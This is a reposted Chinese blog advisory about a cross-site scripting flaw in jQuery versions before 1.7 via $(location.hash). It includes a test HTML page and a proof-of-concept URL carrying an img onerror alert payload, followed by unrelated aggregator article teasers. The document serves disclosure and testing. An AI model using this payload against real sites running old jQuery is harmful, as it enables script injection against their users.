版本低于1.7的jQuery過濾用戶輸入數據所使用的正則表達式存在缺陷

版本低于1.7的jQuery過濾用戶輸入數據所使用的正則表達式存在缺陷

news/2025/7/28 23:09:33/文章來源:https://blog.csdn.net/hanghangaidoudou/article/details/77182595

jquery下載地址：https://code.jquery.com/jquery/

影響范圍：

????版本低于1.7的jQuery過濾用戶輸入數據所使用的正則表達式存在缺陷，可能導致LOCATION.HASH跨站漏洞

已測試成功版本：

????jquery-1.6.min.js，jquery-1.6.1.min.js，jquery-1.6.2.min.js

????jquery-1.5所有版本

????jquery-1.4所有版本

????jquery-1.3所有版本

????jquery-1.2所有版本

測試：

啟動nginx，并建立index.html頁面，內容如下：

漏洞發現者給的測試代碼：

<html>

<head>

????<title>JQuery-xss-test</title>

????<script src="-test-https://code.jquery.com/jquery-1.6.1.min.js"></script>

????<script>

????$(function(){

????try { $(location.hash) } catch(e) {}

????})

????</script>

</head>

<body>

????Jquery xss test.

</body>

</html>

訪問地址：

http://localhost/#<img src=/ οnerrοr=alert(/F4ckTeam/)>

測試截圖：

技術分享

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/387555.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/387555.shtml
英文地址，請注明出處：http://en.pswp.cn/news/387555.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！

相關文章

RabbitMQ學習總結（6）——消息的路由分發機制詳解

RabbitMQ學習總結（6）——消息的路由分發機制詳解

2019獨角獸企業重金招聘Python工程師標準>>> 一、Routing(路由) (using the Java client)在前面的學習中，構建了一個簡單的日志記錄系統，能夠廣播所有的日志給多個接收者，在該部分學習中，將添加一個新的特點&#xff0…

閱讀更多...

Kaggle爆文：一個框架解決幾乎所有機器學習問題

Kaggle爆文：一個框架解決幾乎所有機器學習問題

上周一個叫 Abhishek Thakur 的數據科學家，在他的 Linkedin 發表了一篇文章 Approaching (Almost) Any Machine Learning Problem，介紹他建立的一個自動的機器學習框架，幾乎可以解決任何機器學習問題，項目很快也會發布出來。這篇…

閱讀更多...

C# HttpWebRequest GET HTTP HTTPS 請求

C# HttpWebRequest GET HTTP HTTPS 請求

這個需求來自于我最近練手的一個項目，在項目中我需要將一些自己發表的和收藏整理的網文集中到一個地方存放，如果全部采用手工操作工作量大而且繁瑣，因此周公決定利用C#來實現。在很多地方都需要驗證用戶身份才可以進行下一步操作，…

閱讀更多...

HttpStatusCode

HttpStatusCode

https://docs.microsoft.com/en-us/dotnet/api/system.net.httpstatuscode?viewnetframework-4.7.2 422 UnprocessableEntity What HTTP status response code should I use if the request is missing a required parameter? Status 422 seems most appropiate based on the…

閱讀更多...

numpy 和tensorflow 中的乘法

numpy 和tensorflow 中的乘法

矩陣乘法：tf.matmul() np.dot() ， 逐元素乘法：tf.multiply() np.multiply()轉載于:https://www.cnblogs.com/lizhiqing/p/10307760.html

閱讀更多...

啟用了不安全的HTTP方法

啟用了不安全的HTTP方法

安全風險：可能會在Web 服務器上上載、修改或刪除Web 頁面、腳本和文件。可能原因：Web 服務器或應用程序服務器是以不安全的方式配置的。修訂建議：如果服務器不需要支持WebDAV，請務必禁用它，或禁止不必要的HTTP 方法。方…

閱讀更多...

Mysql學習總結（4）——MySql基礎知識、存儲引擎與常用數據類型

Mysql學習總結（4）——MySql基礎知識、存儲引擎與常用數據類型

2019獨角獸企業重金招聘Python工程師標準>>> 1、基礎知識 1.1、數據庫概述簡單地說：數據庫（Database或DB）是存儲、管理數據的容器；嚴格地說：數據庫是“按照某種數據結構對數據進行組織、存儲和管理的容器”…

閱讀更多...

django權限二(多級菜單的設計以及展示)

django權限二(多級菜單的設計以及展示)

多級權限菜單設計級標題欄我們現在只有數據展示,要進入其他url還需要手動的輸入路徑,非常的麻煩,所以我們要設計一個導航欄以及側邊多級菜單欄,這個展示是通過stark組件的設計的增刪改查頁面,而每一個頁面我們都需要有導航欄和側邊的權限菜單欄,所以把這個公共的部分提起到…

閱讀更多...

6.17 dokcer(一)Compose 簡介

6.17 dokcer(一)Compose 簡介

Compose 簡介 Compose 項目是 Docker 官方的開源項目，負責實現對 Docker 容器集群的快速編排。從功能上看，跟 OpenStack 中的 Heat 十分類似。其代碼目前在 https://github.com/docker/compose 上開源。 Compose 定位是「定義和運行多個 Docker 容器的…

閱讀更多...

【系統架構理論】一篇文章精通：Spring Cloud Netflix Eureka

【系統架構理論】一篇文章精通：Spring Cloud Netflix Eureka

是官方文檔的總結 http://spring.io/projects/spring-cloud-netflix#overview 講解基于2.0.2版本官方文檔 https://cloud.spring.io/spring-cloud-static/spring-cloud-netflix/2.0.2.RELEASE/single/spring-cloud-netflix.html Netflix提供了以下功能： 服務發現&am…

閱讀更多...

Flink DataStream 編程入門

Flink DataStream 編程入門

流處理是 Flink 的核心，流處理的數據集用 DataStream 表示。數據流從可以從各種各樣的數據源中創建（消息隊列、Socket 和文件等），經過 DataStream 的各種 transform 操作，最終輸出文件或者標準輸出。這個過程跟之前文…

閱讀更多...

騰訊手游如何提早揭露游戲外掛風險？

騰訊手游如何提早揭露游戲外掛風險？

目前騰訊SR手游安全測試限期開放免費專家預約！點擊鏈接：手游安全測試立即預約！ 作者：sheldon，騰訊高級安全工程師商業轉載請聯系騰訊WeTest獲得授權，非商業轉載請注明出處。文中動圖無法顯示&#xff0c…

閱讀更多...

基于ARM Cortex-M0+ 的Bootloader 參考

基于ARM Cortex-M0+ 的Bootloader 參考

源： 基于ARM Cortex-M0內核的bootloader程序升級原理及代碼解析轉載于:https://www.cnblogs.com/LittleTiger/p/10312784.html

閱讀更多...

小猿圈web前端之網站性能優化方案

小猿圈web前端之網站性能優化方案

現在前端不僅要能做出一個網站頁面，還要把這個頁面做的炫酷，那需要很大程度的優化，那么怎么優化才更好呢？小猿圈總結了一下自己優化的方案，感興趣的朋友可以看一下。一般網站優化都是優化后臺，如接口的響應…

閱讀更多...

下面介紹一個開源的OCR引擎Tesseract2。值得慶幸的是雖然是開源的但是它的識別率較高，并不比其他引擎差勁。網上介紹Tessnet2也是當時時間排名第三的識別引擎，只是后來慢慢不維護了，目前是G

下面介紹一個開源的OCR引擎Tesseract2。值得慶幸的是雖然是開源的但是它的識別率較高，并不比其他引擎差勁。網上介紹Tessnet2也是當時時間排名第三的識別引擎，只是后來慢慢不維護了，目前是G

下面介紹一個開源的OCR引擎Tesseract2。值得慶幸的是雖然是開源的但是它的識別率較高，并不比其他引擎差勁。網上介紹Tessnet2也是當時時間排名第三的識別引擎，只是后來慢慢不維護了，目前是Google在維護，大家都知道Google 在搞電子…

閱讀更多...

js 更改json的 key

js 更改json的 key

let t data.map(item > {return{fee: item[費用],companyName1: item.companyName,remark1: item.remark,beginTime1: item.beginTime,endTime1: item.endTime}})console.log(t) 源地址：https://www.cnblogs.com/Marydon20170307/p/8676611.html轉載于:https:/…

閱讀更多...

1.4版本上線(第八次會議）

1.4版本上線(第八次會議）

在小組成員連夜趕工的奮斗下，終于在昨天深夜成功實現了UI界面功能至此，我們的系統終于真正可實用而不是局限在命令行進行互動了由于python嵌入數據庫功能實現難度較大，迫于時間的局限性，我們選擇了用json文件與txt文件進行替代&…

閱讀更多...

分UV教程

分UV教程

第一步首先，打開一個練習場景“空中預警機1.max”（這事小弟平時的練習做的不好獻丑了）。（圖01） 圖01 第二步這里我們拿機翼來舉例子，隱藏除機翼意外的其他模型。（圖02） 圖02 第三步…

閱讀更多...

k8s系列--- dashboard認證及分級授權

k8s系列--- dashboard認證及分級授權

http://blog.itpub.net/28916011/viewspace-2215214/ 因版本不一樣，略有改動 Dashboard官方地址： https://github.com/kubernetes/dashboard dashbord是作為一個pod來運行，需要serviceaccount賬號來登錄。先給dashboad創建一個專用的認證信息…

閱讀更多...

JAVA項目開發

JAVA項目開發

16年java軟件開發經驗，全職項目開發，項目可簽合同、開普票和專票。主要承接項目： 1、網站開發項目自主開發千帆CMS動態發布系統，基于java/springboot2/jpa/easyui開發，簡單易用，后臺與前端分離&#xff0…

閱讀更多...

最新文章